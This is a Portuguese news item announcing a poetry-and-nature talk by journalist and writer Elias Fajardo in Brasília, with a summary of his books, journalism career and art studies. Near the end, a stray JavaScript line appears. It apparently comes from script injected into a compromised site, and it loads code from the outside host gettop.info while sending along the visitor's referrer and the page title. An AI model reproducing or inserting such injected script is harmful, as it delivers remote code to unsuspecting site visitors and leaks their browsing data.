“Poesia e Natureza” terá a presença de Elias Fajardo

BSB Capital 26/06/2017 às 11:53, Atualizado em 18/09/2017 às 21:13

O jornalista e escritor participará da manhã de saúde e cultura na Praça da Harmonia Universal (EQN 104/105) na próxima quinta-feira (29)

Elias Fajardo já publicou 12 livros, fez roteiros para vídeos, oficinas de contos, ilustrações e mostras individuais de aquarelas e pinturas em cidades do Rio e de Minas Gerais. Foto: Divulgação

 

O jornalista e escritor Elias Fajardo participará da roda de conversa “Poesia e Natureza” durante a manhã de saúde e cultura na Praça da Harmonia Universal, EQN 104/105 (Asa Norte), na próxima quinta-feira (29). A roda de conversa com ele começará as 9h, dentro da manhã de saúde e cultura, das 7h30 às 10h, com Tai Chi Being Tao e com o professor Antônio Amorim. O evento inteiro é aberto ao público.

Elias Fajardo trabalha com imagens e palavras. Ele tem 12 livros publicados ―obras de ficção, educativas e jornalísticas. Ecologia e Cidadania – Se Cada um Fizer a Sua Parte, (Editora Senac Nacional), por exemplo, vendeu mais de 60 mil exemplares. A partir de 2011 publicou os romances “Ser Tão Menino”, “Aventuras de Rapaz” e “Belo Como um Abismo”, pela editora 7Letras, este último finalista no Prêmio Jabuti categoria romance de 2016.

Oficinas

Foi roteirista de três séries de vídeos educativos do Senac – DN. Seu primeiro livro de poesias “Poemas do Vai e Vem” foi publicado em 2016. Tem realizado oficinas de contos e romances na Estação das Letras, no Rio. Ilustrou livros e fez mostras individuais de aquarela e pintura no Rio, Nova Friburgo, Teresópolis, Leopoldina e Cataguases (MG).

No seu currículo consta também cursos de desenho com Roberto Magalhães, modelo vivo com Gianguido Bonfanti, pintura com João Magalhães, arte contemporânea com Anna Bella Geiger na Escola de Artes Visuais do Parque Lage, no Rio.

Elias Fajardo começou no jornalismo em 1970. Esteve na pequena, média e grande imprensa. Passou pela Bloch Editores, Jornal do Brasil, O Globo e revistas Ecologia e Desenvolvimento e Cadernos do Terceiro Mundo. Doze livros: obras de ficção, educativas e jornalísticas. Foi chefe de redação do programa de TV Globo Ecologia de 1996 a 2005.

 s.src=’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

Deixe um comentário

Rolar para cima